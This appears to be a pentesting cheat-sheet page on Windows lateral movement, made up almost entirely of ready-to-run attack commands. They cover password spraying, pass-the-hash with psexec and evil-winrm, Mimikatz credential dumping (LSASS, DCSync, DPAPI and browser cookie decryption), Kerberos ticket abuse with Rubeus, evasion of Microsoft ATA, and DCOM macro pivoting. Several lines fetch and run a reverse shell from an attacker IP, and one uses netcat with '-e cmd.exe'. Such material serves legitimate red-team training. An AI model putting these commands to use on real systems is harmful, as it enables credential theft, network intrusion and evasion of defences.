Kali Linux Fu
API Pentesting
Programming
Maintaining Access
Certifications
Exfiltration
Wireless Pentesting
Lateral Movement

Tips

  • Blend in with internal protocols:
    • SMB ( Psexec, schtasks, sc, WMIC)
    • RDP
    • SSH
    • VNC
    • WinRM (PowerShell)

​

Firewall configuration

1
netsh advfirewall firewall add rule name="firestone proxy" dir=in action=allow protocol=tcp localport=45001
Copied!

Password Spraying

1
crackmapexec smb <IP/24> -u usernames -p Passwords --continue-on-success --ufail-limit 3
2
crackmapexec smb 192.168.10.11 -u Administrator -p '[email protected]' -x whoami --shares
3
crackmapexec smb 10.55.100.0/24 -u winlab -H <Hash> --local-auth --lsa
4
​
5
kerbrute_linux_amd64 password spray -v -d <domain> --dc <IP> users.txt <Pass>
6
​
7
#Brute-force password
8
/kerbrute_linux_amd64 bruteuser --dc <IP> -d <domain.local> rockyou.txt <username>
9
​
10
pth-winexe //<IP> -U <Username>%<Pass/hash> cmd
11
​
12
evil-winrm -u <username> -H <Hash> -i <IP>
13
​
14
psexec.py <hostname>/Administrator:<password>@192.168.1.104
15
psexec.py <domain>.<local>/[email protected]<IP> -hashes "<hash>"
16
git clone https://github.com/Greenwolf/Spray.git
17
./spray.sh -smb 172.31.3.8 /users.txt /pass.txt <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <Domain> skipuu
Copied!
​
1
#PTH-Winexe
2
pth-winexe -U Administrator%<HASH> //<IP>/cmd
3
pth-winexe --system -U 'admin%<HA:SH>' //192.168.1.22 cmd.exe
4
​
5
#WMI
6
Wmic /node:COMPUTER/user:DOMAIN\USER /password:PASSWORD process call create β€œCOMMANDβ€œ
7
#PowerShell (WMI)
8
Invoke-WMIMethod -Class Win32_Process -Name Create –ArgumentList $COMMAND –ComputerName $COMPUTER -Credential $CRED
9
#wmiexec
10
#Does not drop into NT Authority/SYSTEM
11
​
12
#WinRM
13
evil-winrm -u 'user' -H '<:LM Hash>' -i <IP> -s <PS_SCRIPTS_LOCAL_PATH>
14
​
15
winrs –r:COMPUTER COMMAND
16
​
17
#PowerShell Remoting
18
Invoke-Command –computername $COMPUTER -command { $COMMAND}
19
New-PSSession -Name PSCOMPUTER –ComputerName $COMPUTER; Enter-PSSession -Name PSCOMPUTER
20
​
21
iex (iwr http://<IP>/Invoke-Mimikatz.ps1 -UseBasicParsing)
22
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
Copied!

Kerberos Double Hop Workaround

If you obtain the shell through pass the hash or pass the ticket, you perform a network login, which means you run into the Kerberos double hop issue.
The way around it is to perform an interactive login, but that requires the clear text creds.
Psremoting uses pass the ticket. It’s how Kerberos is meant to work and a limitation - it’s actually the entire reason Kerberos delegation was invented.
Often the simplest way is to perform process migration/injection into a system process and perform actions from that, as that acts in the context of the computer account which did a interactive login at startup
1
$username = 'devmanager'
2
$password = 'F0rRunning$cheduledTasks!'
3
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
4
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
5
Invoke-Command -ComputerName CASC-DC1.CASCADE.LOCAL -Credential $credential -scriptblock {powershell.exe -c "IEX(iwr http://10.10.14.22/Invoke-PowerShellTcp.ps1 -UseBasicParsing)" }
6
​
7
#Invoke hostname on 3rd server
8
$cred = Get-Credential Contoso\Administrator
9
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
10
Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
11
}
12
​
13
#Port forwarding from host to Target's WinRM
14
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
15
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
16
Enter-PSSession Session1 -Credential domain\user
17
​
18
​
19
#Ref:https://posts.slayerlabs.com/double-hop/
20
#Creates a new session configuration on the remote computer
21
#when connected, forces it to always run with the credential provided.
22
Invoke-Command -ComputerName <Hop1PC> -ScriptBlock { Register-PSSessionConfiguration -Name Creds -RunAsCredential <domain-name>\<domainaccount> -Force }
23
Invoke-Command -ScriptBlock {\\<Kali-IP>\revshell.exe 10.10.x.x 4445} -Credential <Hop1PC> -ConfigurationName Creds
24
​
25
#Run a process as a different user
26
$secpasswd = ConvertTo-SecureString "<pass>" -AsPlainText -Force
27
$mycreds = New-Object System.Management.Automation.PSCredential ("<domain\username>", $secpasswd)
28
$computer = "<COMPUTER_NAME>"
29
​
30
Start-Process powershell.exe -Credential $Using:mycreds -NoNewWindow
31
#Troubleshoot
32
$s = New-PSSession -Credential $mycreds
33
Invoke-Command -Session $s -Scriptblock {whoami}
34
​
35
#Enable RDP on target
36
#1.Add yourself to the remote desktop users group
37
#2. Enable on target using Powershell
38
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
39
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
40
​
41
#3.Execute from a shell. Do not execute from PSRemoting session.
42
#If you execute the following commands from a Remote Powershell session, you will be disconnected because we set the RDP listen port to 5985,
43
#so we will have to sc.exe stop WinRM before running Remote Desktop Service
44
​
45
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
46
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" -Name PortNumber -Value 5985
47
sc.exe stop WinRM
48
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
49
​
50
#Runas
51
runas /netonly /user:garrison.local\Administrator powershell.exe
Copied!

psexec

  • Required CIFS ticket on target.
  • Requires manual deletion using sc
1
#psexec. Drops into NT Authority/SYSTEM
2
psexec.py BLACKFIELD.local/<user>@<IP> -hashes ":<NT hash>"
3
​
4
#Execute local executable on remote system
5
psexec.exe \\REMOTECOMPUTER –i -c <localfile.exe> /accepteula
6
​
7
#Execute as SYSTEM
8
psexec -s cmd
9
​
10
#enable PSRemote remotely
11
$computerName = 'REMOTECOMPUTER'
12
psexec "\\$Computername" -s c:\windows\system32\winrm.cmd quickconfig -quiet 2&>&1> $null
13
#OR
Copied!

PowerShell Remoting

Types:
  • One-to-one
    • Runs in a process: wsmprovhost
    • Stateful
    • Requires Local Admin Privs on target
    • Credentials are not left on target unless there's CREDSSP, Constrained Delegation
  • One-to-many
    • Run command and scripts on thousands of machines even as background jobs.
    • Idealfor passing hashes and using credentials on multiple computers.
    • Commands are executed in parallel
    • Non-Interactive
    • Commandlet: Invoke-Command

Start an Interactive Session

  • Tip: Find machines where current user has Local Admin Access using Find-LocalAdminAccess.
1
//Works on machines where current user has Local Admin Access.
2
Enter-PSSession -ComputerName pc1.domain.local
3
​
4
Enter-PSSession -ComputerName 192.168.0.2 -Credential domain\username
5
​
6
//Create a new session
7
New-PSSession -ComputerName 192.168.0.2 -Credential domain\username
8
Enter-PSSession -ComputerName 192.168.0.2 -Credential domain\username
9
​
10
//List sessions
11
Get-PSSession -ComputerName 192.168.0.2 -Credential domain\username
12
​
13
Exit-PSSession
14
​
15
#Stateful property
16
$sess = New-PSSession -ComputerName pc1.domain.local
17
Enter-PSSession -Session $sess
18
$proc=Get-Process
19
​
20
*Exits & reconnects*
21
$proc
Copied!

Enable PS Remoting Remotely

1
$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'
2
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName remote-computer -Credential domain\user -ArgumentList $command
3
​
4
#With DA privileges
5
#https://github.com/samratashok/RACE
6
Set-RemotePSRemoting –SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
Copied!

Execute Commands

1
Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <File containing list of servers>)
2
Invoke-Command -Session $sessionname -FilePath 'path to the powershell script'
3
//Where the session argument is:
4
$sessionname= New-PSSession -ComputerName <IP> -Credential <domain/username> -Name anysessionname
5
​
6
#Load from function store
7
. .\name_of_function.ps1
8
Invoke-Command -ComputerName Server01 -ScriptBlock ${function:name_of_function}
9
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
10
​
11
#Opens new cmd window
12
runas /user:<domain>\<user> cmd.exe
13
​
14
#Start a process as another user
15
$username = "DOMAIN\USER"
16
$password = "PASSWORD"
17
$credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
18
Start-Process nc64.exe -ArgumentList '-e cmd.exe xx.xx.xx.xx 80' -Credential ($credentials)
Copied!

SharpSploit

1
menu
2
SharpSploit.Credentials.Mimikatz.SamDump()
Copied!

Mimikatz

The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver
  • Run Powershell as Administrator
  • Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script.
  • Requires administrator and often debug rights.
References:
1
#Ways to dump credentials from memory
2
​
3
--
4
-Dumping LSASS from Task Manager
5
get-process lsass
6
tasklist | findstr lsass
7
procdump.exe -accepteula -ma β€œlsass.exe” out.dmp
8
procdump.exe -accepteula -ma 580 out.dmp
9
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\out.dmp full
10
​
11
crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa
12
​
13
#From Windows
14
sekurlsa::minidump c:\lsass.dmp
15
log lsass.txt
16
sekurlsa::logonPasswords
17
​
18
#From Linux
19
pypykatz lsa minidump lsass.DMP
20
--
21
​
22
​
23
#Enable WDigest to store clear-text credentials
24
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
25
sekurlsa::wdigest
26
​
27
sekurlsa::logonpasswords
28
​
29
privilege::debug
30
sekurlsa::logonpasswords
31
sekurlsa::tickets /export
32
kerberos::ptt <file>.kirbi
33
misc::skeleton
34
​
35
lsadump::lsa /inject
36
token::elevate
37
lsadump::sam
38
lsadump::secrets
39
lsadump::trust /patch
40
lsadump::lsa /patch
41
​
42
lsadump::dcsync /user:dcorp\krbtgt
43
​
44
#Cached logons. Can’t perform β€œpass-the-hash” style attacks with this type of hash.
45
"token::elevate" "lsadump::cache"
46
hashcat -m2100 '$DCC2$10240#<NAME>#<HASH>' /usr/share/wordlists/rockyou.txt --force --potfile-disable
47
​
48
#Restore NT hash of a user
49
lsadump::setntlm /user:<user> /ntlm:<hash>
50
​
51
#Export private certificates
52
Invoke-Mimikatz –DumpCerts
53
​
54
#SSP Attack: Store passwords of all logins in clear-text to c:\Windows\System32\mimilsa.log
55
"privilege::debug" "misc::memssp"
56
​
57
-----
58
#Credential Manager
59
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Vault"
60
"vault::list"
61
​
62
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Credentials"
63
"vault::cred"
64
​
65
#List plain-text creds [Risky]
66
"vault::cred" /patch
67
​
68
-----
69
#DPAPI Abuse
70
​
71
dir /a c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
72
​
73
#Copy Master Key
74
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
75
​
76
#Grab GUID Master Key value
77
dir /a c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value>
78
​
79
#Grab Master Key to Decrypt
80
dpapi::masterkey /in:c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value> /rpc
81
​
82
#Decrypt
83
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file> /masterkey:<Key value from above command>
84
​
85
--
86
#Dump Domain-wide DPAPI Backup Key from DC
87
lsadump::backupkeys /system:<DC> /export
88
​
89
#Decrypt target user's master key using DPAPI Backup key
90
dpapi::masterkey /in:"<User-master-key>" /pvk:"Domain-backup-key"
91
​
92
#Decrypt cookie values with target user's master key
93
dpapi::chrome /masterkey:<user-master-key> /in:<Path-to-chrome-cookies>
94
--
95
#Crack masterkey with user's clear-text pass
96
dpapi::masterkey /in:<Users-key> /sid:<User-SID> /password:<password> /protected
97
​
98
#Without knowing the password, but with code exec, extract domain key from DC
99
dpapi::masterkey /in:"%appdata\Microsoft\Protect\<SID>\<Master-key-GUID> /rpc
100
​
101
#Decrypt credentials from Windows Vault using master key
102
dpapi::creds /in:<creds> /masterkey:<masterkey> /unprotect
Copied!

Over Pass The Hash

  • Obtain Kerberos tickets from NTLM hash.
  • An attacker can leverage the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account, but require Kerberos authentication to reach your destination.
  • Likely to cause an alert since the encryption method of the EncryptedTimestamp field in AS_REQ is being downgraded.
  • To make this attack stealthier, use NTLM + AES keys [aes256_hmac + aes128_hmac]
    • aes128 keys can be specified even if they do not actually exist.
1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'
2
​
3
#To bypass Microsoft ATA, pass AES keys as well.
4
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /aes256:<aeshash> /aes128:<Aes key> /run:powershell.exe"'
5
​
6
#Get a reverse shell using NTLM hash
7
$Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''<IP>/Invoke-PowerShellTcp.ps1''))'
8
Out-File -Encoding Ascii -InputObject $Contents -FilePath C:\blah\reverse.bat
9
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.local /ntlm:<ntlm> /run:C:\blah\reverse.bat"'
Copied!
Steal token from notepad process.

Rubeus

1
#Convert clear-text password to hash
2
Rubeus.exe hash /password:Password123!
3
Rubeus.exe hash /password:Password123! /user:harmj0y /domain:testlab.local
4
​
5
#Request a TGT
6
Rubeus.exe asktgt /user:<user> /rc4:<hash> /ptt
7
​
8
#Request a TGT impersonating Administrator
9
.\Rubeus.exe s4u /user:<user A> /rc4:<User A's hash> /impersonateuser:Administrator /msdsspn:"CIFS/<Service-PC-Name>" /ptt
10
​
11
#.\kekeo.exe
12
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
13
#Request TGS
14
tgs::s4u /tgt:<TGT-file.kirbi> /user:[email protected]<domain> /service:cifs/dcorpmssql.dollarcorp.moneycorp.LOCAL
15
​
16
#Monitor for new TGTs
17
.\Rubeus.exe monitor /interval:5 /nowrap
18
​
19
#By default TGTs are valid for 10h. However TGTs can be renewed for upto 7 days
20
Rubeus.exe renew /ticket:<ticket> /autorenew
Copied!

DCOM

  • ​Reference​
  • DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.
  • Requires LA privileges on target.
  • Requires the presence of Microsoft Office on the target computer.
1
#Outlook
2
Reference: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
3
​
4
$com = [Type]::GetTypeFromProgID('Outlook.Application’,’192.168.99.152’)
5
$object = [System.Activator]::CreateInstance($com)
6
$RemoteScriptControl = $object.CreateObject(β€œScriptControl”)
7
​
8
#Compiling the β€œpayload” in C#, & pass it to DotNetToJScript. Save output to $code
9
$RemoteScriptControl.Language = β€œJScript”
10
$RemoteScriptControl.AddCode($code)
11
​
12
​
13
#Excel: Create a macro-enabled excel docm
14
Reference: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
15
​
16
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application","<Remote-IP>"))
17
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
18
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
19
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
20
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
21
$temp = [system.io.directory]::createDirectory($Path)
22
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
23
$com.Run("mymacro")
24
​
25
PSScript: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b
26
Invoke-ExcelMacroPivot -Target "192.168.99.152" -RemoteDocumentPath "C:\Book1.xlsm" -MacroName "Auto_Open"
27
​
28
#PowerPoint: Create a PowerPoint add-in from this content, you must save as either a PPA / PPAM file
29
Reference: https://attactics.org/2018/02/dcom-lateral-movement-powerpoint/
30
PSScript: https://github.com/attactics/Invoke-DCOMPowerPointPivot/blob/master/Invoke-DCOMPowerPointPivot.ps1
31
​
32
$com = [activator]::**CreateInstance**([type]::**GetTypeFromProgId**("PowerPoint.Application", "10.10.10.10"))
33
$addin = $com.AddIns.**Add**("c:\testfile.ppam")
Copied!

WMI

Port Forwarding

gss-api proxy

  • This creates a proxy on port 8080 on the target.
  • Once port forward is set up to the attackers host, gss-api proxy enabled us to hijack the victim's active kerberos tickets to access intranet sites.
1
#May need to bypass UAC initially
2
https://github.com/mikkolehtisalo/gssapi-proxy
Copied!

Firewall Rules Modification

1
netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT
2
​
3
#Metasploit
4
use multi/manage/autoroute
5
​
6
#Reverse port forward.
7
run portfwd -R -p <Remote pivot port> -l <Local port to listen on> -L <Local Host IP to listen on>
8
​
9
#Set up SOCKS proxy [/etc/proxychains.conf]
10
use auxiliary/server/socks4a
11
to same as -l
Copied!
  • Download from here​
  • Copy binary + Private_Key.ppk to target.
  • Establish reverse connection to Attacker's SSH server to create an SSH tunnel.
1
gedit /etc/ssh/sshd_config
Copied!
Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers.
  • Transfer binary to the target
  • Use it to create a reverse connection. cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT [email protected]_IP -i KEYFILE -N
  • Keys will not work properly here. Convert from id_rsa to KEY.ppk
1
#Generate SSH keys using ssh-keygen
2
sudo apt install putty-tools
3
puttygen KEYFILE -o OUTPUT_KEY.ppk
Copied!
The resulting .ppk file can then be transferred to the Windows target and used in exactly the same way as with the Reverse port forwarding taught in the previous task (despite the private key being converted, it will still work perfectly with the same public key we added to the authorized_keys file)
​

Proxy

- Article on using a proxy to an internal network. https://www.blackhillsinfosec.com/a-toast-to-kerberoast/​

1
#Proxychains
2
#/etc/proxychains.conf [Disable 'proxy_dns']
3
socks4 127.0.0.1 8080
4
​
5
#For Kerberos process to work, include entries for FQDN and NetBIOS names
6
10.10.10.22 small.domain.com
7
10.10.10.22 dc-01
8
10.10.10.23 workstation-01
9
​
10
#Metasploit
11
auxiliary/server/socks4a
12
SET SRVHOST 0.0.0.0
13
SET SRVPORT 8080
14
route add 10.10.10.0 255.255.255.0 1
15
exploit
16
​
17
#Execute required tool
18
proxychains GetUserSPNs.py -request -dc-ip 10.10.10.103
Copied!
​
​